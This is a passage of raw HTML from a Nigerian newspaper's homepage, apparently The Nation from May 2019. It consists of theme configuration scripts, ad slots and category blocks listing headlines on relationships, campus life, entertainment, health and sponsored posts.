href="https://thenationonlineng.net/how-to-overcome-rejection-by-a-crush/">How to overcome rejection by a crush</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1021458 post type-post status-publish format-standard has-post-thumbnail hentry category-news-update category-top-relationship-tips-advice tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/seven-ways-to-win-your-mother-in-laws-heart/">Seven ways to win your mother-in-law’s heart</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-828862 post type-post status-publish format-standard has-post-thumbnail hentry category-top-relationship-tips-advice tag-breakups tag-reasons-why-women-break-up-with-men tag-relationships"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/10-reasons-women-break-up-with-men/">10 reasons women break up with men</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-814629 post type-post status-publish format-standard has-post-thumbnail hentry category-top-relationship-tips-advice"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/husband-takes-care-mother-kids/">&#8216;My husband takes care of his Mother than our kids&#8217;</a> </h3> </div> </article> </div> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> </div> <script>var jnews_module_915165_16_5cdd84c9c25a6 = {"header_icon":"","first_title":"Relationships","second_title":"","url":"http:\/\/thenationonlineng.net\/category\/saturday-magazine\/weekend-treat\/top-relationship-tips-advice\/","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"6","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"98","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"custom","date_format_custom":"","pagination_mode":"disable","pagination_nextprev_showtext":"","pagination_number_post":4,"pagination_scroll_limit":0,"boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":"","compatible_column_notice":"","paged":1,"column_class":"jeg_col_1o3","class":"jnews_block_24"};</script> </div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-4"><div class="jeg_wrapper "><div class="wpb_wrapper"><div class="jeg_postblock_24 jeg_postblock jeg_module_hook jeg_pagination_disable jeg_col_1o3 jnews_module_915165_17_5cdd84c9c79a1 " data-unique="jnews_module_915165_17_5cdd84c9c79a1"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><a href="https://thenationonlineng.net/category/nigeria-universities-breaking-news/"><span>Campus Life</span></a></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts"> <article class="jeg_post jeg_pl_md_box post-1040887 post type-post status-publish format-standard has-post-thumbnail hentry category-nigeria-universities-breaking-news tag-ksu tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="box_wrap"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/ksu-tackles-indecent-dressing/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="KSU tackles indecent dressing" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/Kogi-State-University-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/Kogi-State-University-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/Kogi-State-University-120x86.jpg 120w" data-expand="700" /></div></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/ksu-tackles-indecent-dressing/">KSU tackles indecent dressing</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/ksu-tackles-indecent-dressing/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </div> </article> <div class="jeg_postsmall jeg_load_more_flag"> <article class="jeg_post jeg_pl_xs_4 post-1040888 post type-post status-publish format-standard hentry category-nigeria-universities-breaking-news tag-nigerian-news tag-nigerian-newspaper tag-reading-challenge tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/the-reading-challenge-2/">The reading challenge</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040880 post type-post status-publish format-standard hentry category-nigeria-universities-breaking-news tag-uniben-pharmacy"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/uniben-pharmacy-students-protest-teachers-strike/">UNIBEN Pharmacy students protest teachers’ strike</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040875 post type-post status-publish format-standard hentry category-nigeria-universities-breaking-news tag-udus"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/udus-union-elects-executives/">UDUS union elects executives</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040874 post type-post status-publish format-standard has-post-thumbnail hentry category-nigeria-universities-breaking-news tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/jakande-others-bag-aocoed-fellowship-awards/">Jakande, others bag AOCOED fellowship awards</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040882 post type-post status-publish format-standard hentry category-nigeria-universities-breaking-news tag-arabic-literature"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/arabic-literature-can-redefine-world-peace/">Arabic literature can redefine world peace</a> </h3> </div> </article> </div> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> </div> <script>var jnews_module_915165_17_5cdd84c9c79a1 = {"header_icon":"","first_title":"Campus Life","second_title":"","url":"http:\/\/thenationonlineng.net\/category\/nigeria-universities-breaking-news\/","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"6","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"81","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"custom","date_format_custom":"","pagination_mode":"disable","pagination_nextprev_showtext":"","pagination_number_post":4,"pagination_scroll_limit":0,"boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":"","compatible_column_notice":"","paged":1,"column_class":"jeg_col_1o3","class":"jnews_block_24"};</script> </div></div></div></div></div><div class="row vc_row vc_inner vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="jeg_wrapper "><div class="wpb_wrapper"><div class='jeg_ad jeg_ad_module jnews_module_915165_18_5cdd84c9d09e5 '><div class='ads-wrapper'><div class=""> <style type='text/css' scoped> .adsslot_3Le7lcPx1q{ width:728px !important; height:90px !important; } @media (max-width:1199px) { .adsslot_3Le7lcPx1q{ width:468px !important; height:60px !important; } } @media (max-width:767px) { .adsslot_3Le7lcPx1q{ width:320px !important; height:50px !important; } } </style> <ins class="adsbygoogle adsslot_3Le7lcPx1q" style="display:inline-block;" data-ad-client="ca-pub-5089981496810613" data-ad-slot="4727903770"></ins> <script async src='//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js'></script> <script>(adsbygoogle = window.adsbygoogle || []).push({});</script> </div></div></div></div></div></div></div><div class="row vc_row vc_inner vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-4"><div class="jeg_wrapper "><div class="wpb_wrapper"><div class="jeg_postblock_24 jeg_postblock jeg_module_hook jeg_pagination_disable jeg_col_1o3 jnews_module_915165_19_5cdd84c9d0cee " data-unique="jnews_module_915165_19_5cdd84c9d0cee"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><a href="https://thenationonlineng.net/category/entertainment/"><span>Entertainment</span></a></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts"> <article class="jeg_post jeg_pl_md_box post-1041212 post type-post status-publish format-standard has-post-thumbnail hentry category-entertainment tag-laura-ikeji-kanu"> <div class="box_wrap"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/our-lives-are-not-perfect-laura-ikeji-sm-influencer-tells-fans/"><div class="thumbnail-container animate-lazy size-715 "><img width="350" height="250" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="`Our lives are not perfect’, Laura Ikeji, SM influencer tells fans" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/LAURA-350x250.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/LAURA-350x250.jpg 350w, https://thenationonlineng.net/wp-content/uploads/2019/05/LAURA-120x86.jpg 120w" data-expand="700" /></div></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/our-lives-are-not-perfect-laura-ikeji-sm-influencer-tells-fans/">`Our lives are not perfect’, Laura Ikeji, SM influencer tells fans</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/our-lives-are-not-perfect-laura-ikeji-sm-influencer-tells-fans/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </div> </article> <div class="jeg_postsmall jeg_load_more_flag"> <article class="jeg_post jeg_pl_xs_4 post-1041165 post type-post status-publish format-standard has-post-thumbnail hentry category-entertainment tag-daddy-showkey"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/daddy-showkey-begs-efcc-to-release-naira-marley-2/">Daddy Showkey begs EFCC to release Naira Marley</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041166 post type-post status-publish format-standard has-post-thumbnail hentry category-entertainment category-online-special tag-israels-2019-eurovision tag-nigerian-news tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/five-things-you-probably-didnt-know-about-israel-eurovision/">Five things you probably didn’t know about Israel, Eurovision</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040721 post type-post status-publish format-standard has-post-thumbnail hentry category-entertainment"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/pan-atlantic-university-begins-m-sc-in-film-production/">Pan-Atlantic University Begins M.Sc in Film Production</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040480 post type-post status-publish format-standard has-post-thumbnail hentry category-entertainment category-news-update tag-britney-spears"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/britney-spears-may-never-perform-again-says-manager/">Britney Spears may never perform again, says manager</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040473 post type-post status-publish format-standard has-post-thumbnail hentry category-entertainment category-news-update tag-avengers tag-endgame tag-game-of-thrones"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/game-of-thrones-avengers-endgame-lead-2019-mtv-movie-nominations/">Game of Thrones, `Avengers: Endgame’ lead 2019 MTV movie nominations</a> </h3> </div> </article> </div> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> </div> <script>var jnews_module_915165_19_5cdd84c9d0cee = {"header_icon":"","first_title":"Entertainment","second_title":"","url":"http:\/\/thenationonlineng.net\/category\/entertainment\/","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"6","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"90","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"custom","date_format_custom":"","pagination_mode":"disable","pagination_nextprev_showtext":"","pagination_number_post":4,"pagination_scroll_limit":0,"boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":"","compatible_column_notice":"","paged":1,"column_class":"jeg_col_1o3","class":"jnews_block_24"};</script> </div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-4"><div class="jeg_wrapper "><div class="wpb_wrapper"><div class="jeg_postblock_24 jeg_postblock jeg_module_hook jeg_pagination_disable jeg_col_1o3 jnews_module_915165_20_5cdd84c9e2809 " data-unique="jnews_module_915165_20_5cdd84c9e2809"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><a href="https://thenationonlineng.net/category/health/"><span>Health</span></a></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts"> <article class="jeg_post jeg_pl_md_box no_thumbnail post-1040901 post type-post status-publish format-standard hentry category-health tag-constipation tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="box_wrap"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/constipation-irritable-bowel-syndrome-and-co-travellers/"><div class="thumbnail-container animate-lazy no_thumbnail size-715 "></div></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/constipation-irritable-bowel-syndrome-and-co-travellers/">Constipation, irritable bowel syndrome and co-travellers</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/constipation-irritable-bowel-syndrome-and-co-travellers/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </div> </article> <div class="jeg_postsmall jeg_load_more_flag"> <article class="jeg_post jeg_pl_xs_4 post-1038947 post type-post status-publish format-standard has-post-thumbnail hentry category-health category-news-update tag-nigeria-news tag-nigeria-newspapers tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/migraine-increases-risk-of-pregnancy-complications/">&#8216;Migraine increases risk of pregnancy complications&#8217;</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1037629 post type-post status-publish format-standard has-post-thumbnail hentry category-health tag-godwin-obaseki tag-health-insurance-scheme"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/efficient-health-insurance-schemell-attract-investment-to-healthcare-sector-obaseki/">Efficient Health Insurance Scheme’ll attract investment to healthcare sector &#8211; Obaseki</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1037171 post type-post status-publish format-standard has-post-thumbnail hentry category-health tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/mandatory-health-insurance-scheme-excites-lagos/">Mandatory health insurance scheme excites Lagos</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1037178 post type-post status-publish format-standard has-post-thumbnail hentry category-health tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/ogun-launches-health-facilities-directory-to-stop-quackery/">Ogun launches health facilities directory to stop quackery</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1037161 post type-post status-publish format-standard has-post-thumbnail hentry category-health tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/nannm-decries-shortage-of-nurses-midwives/">NANNM decries shortage of nurses, midwives</a> </h3> </div> </article> </div> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> </div> <script>var jnews_module_915165_20_5cdd84c9e2809 = {"header_icon":"","first_title":"Health","second_title":"","url":"http:\/\/thenationonlineng.net\/category\/health\/","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"6","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"11","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"custom","date_format_custom":"","pagination_mode":"disable","pagination_nextprev_showtext":"","pagination_number_post":4,"pagination_scroll_limit":0,"boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":"","compatible_column_notice":"","paged":1,"column_class":"jeg_col_1o3","class":"jnews_block_24"};</script> </div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-4"><div class="jeg_wrapper "><div class="wpb_wrapper"><div class="jeg_postblock_24 jeg_postblock jeg_module_hook jeg_pagination_disable jeg_col_1o3 jnews_module_915165_21_5cdd84c9e9d77 " data-unique="jnews_module_915165_21_5cdd84c9e9d77"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><a href="https://thenationonlineng.net/category/online-special/"><span>Online Special</span></a></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts"> <article class="jeg_post jeg_pl_md_box post-1041184 post type-post status-publish format-standard has-post-thumbnail hentry category-online-special tag-force-feeding-babies"> <div class="box_wrap"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/force-feeding-babies-a-dangerous-practice/"><div class="thumbnail-container animate-lazy size-715 "><img width="228" height="221" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-350x250 size-jnews-350x250 lazyload wp-post-image" alt="Force-feeding Babies" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/force-feeding.jpg" data-sizes="auto" data-srcset="https://thenationonlineng.net/wp-content/uploads/2019/05/force-feeding.jpg 228w, https://thenationonlineng.net/wp-content/uploads/2019/05/force-feeding-175x170.jpg 175w" data-expand="700" /></div></a> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/force-feeding-babies-a-dangerous-practice/">Force-feeding Babies: A Dangerous Practice</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_date"><a href="https://thenationonlineng.net/force-feeding-babies-a-dangerous-practice/"><i class="fa fa-clock-o"></i> May 16, 2019</a></div></div> </div> </div> </article> <div class="jeg_postsmall jeg_load_more_flag"> <article class="jeg_post jeg_pl_xs_4 post-1041170 post type-post status-publish format-standard has-post-thumbnail hentry category-news-update category-online-special tag-house-hunting tag-nigeria-news tag-nigeria-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/six-things-to-do-before-house-hunting/">Six things to do before house hunting</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1041166 post type-post status-publish format-standard has-post-thumbnail hentry category-entertainment category-online-special tag-israels-2019-eurovision tag-nigerian-news tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/five-things-you-probably-didnt-know-about-israel-eurovision/">Five things you probably didn’t know about Israel, Eurovision</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040649 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-online-special tag-larae-quy tag-mental-toughness"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/five-ways-to-develop-mental-toughness/">Five ways to develop mental toughness</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-678385 post type-post status-publish format-standard has-post-thumbnail hentry category-news-update category-online-special category-top-relationship-tips-advice tag-nigeria-news tag-nigerian-newspapers tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/10-ways-to-enjoy-your-wedding-day-to-the-fullest/">10 ways to enjoy your wedding day to the fullest</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_4 post-1040420 post type-post status-publish format-standard has-post-thumbnail hentry category-news-update category-online-special tag-nigerian-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/five-things-you-need-to-do-before-moving-out-of-nigeria/">Five things you need to do before moving out of Nigeria</a> </h3> </div> </article> </div> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> </div> <script>var jnews_module_915165_21_5cdd84c9e9d77 = {"header_icon":"","first_title":"Online Special","second_title":"","url":"http:\/\/thenationonlineng.net\/category\/online-special\/","header_type":"heading_6","header_background":"","header_secondary_background":"","header_text_color":"","header_line_color":"","header_accent_color":"","header_filter_category":"","header_filter_author":"","header_filter_tag":"","header_filter_text":"All","post_type":"post","content_type":"all","number_post":"6","post_offset":"0","unique_content":"disable","include_post":"","exclude_post":"","include_category":"1225","exclude_category":"","include_author":"","include_tag":"","exclude_tag":"","sort_by":"latest","date_format":"custom","date_format_custom":"","pagination_mode":"disable","pagination_nextprev_showtext":"","pagination_number_post":4,"pagination_scroll_limit":0,"boxed":"","boxed_shadow":"","el_id":"","el_class":"","scheme":"","column_width":"auto","title_color":"","accent_color":"","alt_color":"","excerpt_color":"","css":"","compatible_column_notice":"","paged":1,"column_class":"jeg_col_1o3","class":"jnews_block_24"};</script> </div></div></div></div></div></div></div><div class="wpb_column jeg_column vc_column_container vc_col-sm-4 vc_custom_1557558497984 jeg_main_content"><div class="jeg_wrapper wpb_wrapper"><div class="wpb_widgetised_column wpb_content_element"> <div class="wpb_wrapper"> <div class="widget_text widget widget_custom_html" id="custom_html-7"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-5089981496810613" data-ad-slot="4520867897" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div></div><div class="widget widget_text" id="text-42"> <div class="textwidget"><p><a href="https://play.google.com/store/apps/details?id=com.wwwebteam.thenationapp"><img class="aligncenter size-full wp-image-956525" src="https://thenationonlineng.net/wp-content/uploads/2018/12/B1-1.png" alt="" width="300" height="250" /></a></p> <p>&nbsp;</p> </div> </div><div class="widget_text widget widget_custom_html" id="custom_html-12"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-5089981496810613" data-ad-slot="7658877560"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div></div><div class="widget widget_jnews_module_block_16" id="jnews_module_block_16-2"><div class="jeg_postblock_16 jeg_postblock jeg_module_hook jeg_pagination_disable jeg_col_1o3 jnews_module_915165_22_5cdd84c9efff0 normal " data-unique="jnews_module_915165_22_5cdd84c9efff0"> <div class="jeg_block_heading jeg_block_heading_6 jeg_subcat_right"> <h3 class="jeg_block_title"><a href="https://thenationonlineng.net/category/sponsored-post/"><span>Sponsored Posts</span></a></h3> </div> <div class="jeg_block_container"> <div class="jeg_posts_wrap"> <div class="jeg_postbig"> <article class="jeg_post jeg_pl_lg_5 post-1039712 post type-post status-publish format-standard has-post-thumbnail hentry category-sponsored-post tag-guinness-time-promo tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspapet"> <div class="jeg_thumb"> <a href="https://thenationonlineng.net/win-big-every-day-in-the-1759-welcome-to-guinness-time-promo/"><div class="thumbnail-container animate-lazy size-500 "><img width="360" height="180" src="https://thenationonlineng.net/wp-content/themes/jnews/assets/img/jeg-empty.png" class="attachment-jnews-360x180 size-jnews-360x180 lazyload wp-post-image" alt="Guinness Time Promo" data-src="https://thenationonlineng.net/wp-content/uploads/2019/05/1759-IMAGE-360x180.jpg" data-sizes="auto" data-srcset="" data-expand="700" /></div></a> <div class="jeg_post_category"> <span><a href="https://thenationonlineng.net/category/sponsored-post/" class="category-sponsored-post">Sponsored Post</a></span> </div> </div> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/win-big-every-day-in-the-1759-welcome-to-guinness-time-promo/">Win Big Every Day In The 17:59 – Welcome To Guinness Time Promo</a> </h3> <div class="jeg_post_meta"><div class="jeg_meta_author"><span class="by">by</span> <a href="https://thenationonlineng.net/author/praise/">Praise Olowe</a></div><div class="jeg_meta_date"><a href="https://thenationonlineng.net/win-big-every-day-in-the-1759-welcome-to-guinness-time-promo/"><i class="fa fa-clock-o"></i> 12:27 pm </a></div><div class="jeg_meta_comment"><a href="https://thenationonlineng.net/win-big-every-day-in-the-1759-welcome-to-guinness-time-promo/#comments"><i class="fa fa-comment-o"></i> 0 </a></div></div> <div class="jeg_post_excerpt"> <p>Guinness Foreign Extra Stout, Nigeria's favorite stout, is celebrating and rewarding loyal customers in 17:59- Welcome To Guinness Time Promo...</p> <a href="https://thenationonlineng.net/win-big-every-day-in-the-1759-welcome-to-guinness-time-promo/" class="jeg_readmore">Read more</a> </div> </div> </article> </div> <div class="jeg_posts jeg_load_more_flag"> <article class="jeg_post jeg_pl_xs_2 post-1036343 post type-post status-publish format-standard has-post-thumbnail hentry category-sponsored-post tag-huawei-technologies tag-nigeria-news tag-nigerian-newspaper tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/a-trendy-and-budget-friendly-smartphone-with-a-bigger-display-and-unique-design/">A trendy and budget friendly smartphone with a bigger display and unique design</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_2 post-1034944 post type-post status-publish format-standard has-post-thumbnail hentry category-sponsored-post tag-nigeria-news tag-nigerian-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/how-unicaf-universitys-mba-in-oil-and-gas-management-can-increase-opportunities-for-nigerian-oil-gas-professionals/">How Unicaf University&#8217;s MBA in Oil and Gas Management can increase opportunities for Nigerian Oil &#038; Gas Professionals</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_2 post-1033607 post type-post status-publish format-standard has-post-thumbnail hentry category-sponsored-post tag-nigeria-news tag-nigerian-newspaper tag-propertymart-real-estate-investment-limited tag-the-nation-newspaper"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/propertymart-on-a-continuous-journey-to-deliver-affordable-housing/">PropertyMart on a continuous journey to deliver affordable housing</a> </h3> </div> </article><article class="jeg_post jeg_pl_xs_2 post-1031472 post type-post status-publish format-standard has-post-thumbnail hentry category-sponsored-post"> <div class="jeg_postblock_content"> <h3 class="jeg_post_title"> <a href="https://thenationonlineng.net/three-reasons-why-huawei-y6-prime-2019-is-an-excellent-option-for-budget-and-style/">Three Reasons why HUAWEI Y6 Prime 2019 is an Excellent Option for Budget and Style.</a> </h3> </div> </article> </div> </div> <div class='module-overlay'> <div class='preloader_type preloader_dot'> <div class="module-preloader jeg_preloader dot"> <span></span><span></span><span></span> </div> <div class="module-preloader jeg_preloader circle"> <div class="jnews_preloader_circle_outer"> <div class="jnews_preloader_circle_inner"></div> </div> </div> <div class="module-preloader jeg_preloader square"> <div class="jeg_square"><div class="jeg_square_inner"></div></div> </div> </div> </div> </div> <div class="jeg_block_navigation"> <div class='navigation_overlay'><div class='module-preloader jeg_preloader'><span></span><span></span><span></span></div></div> </div> <script>var 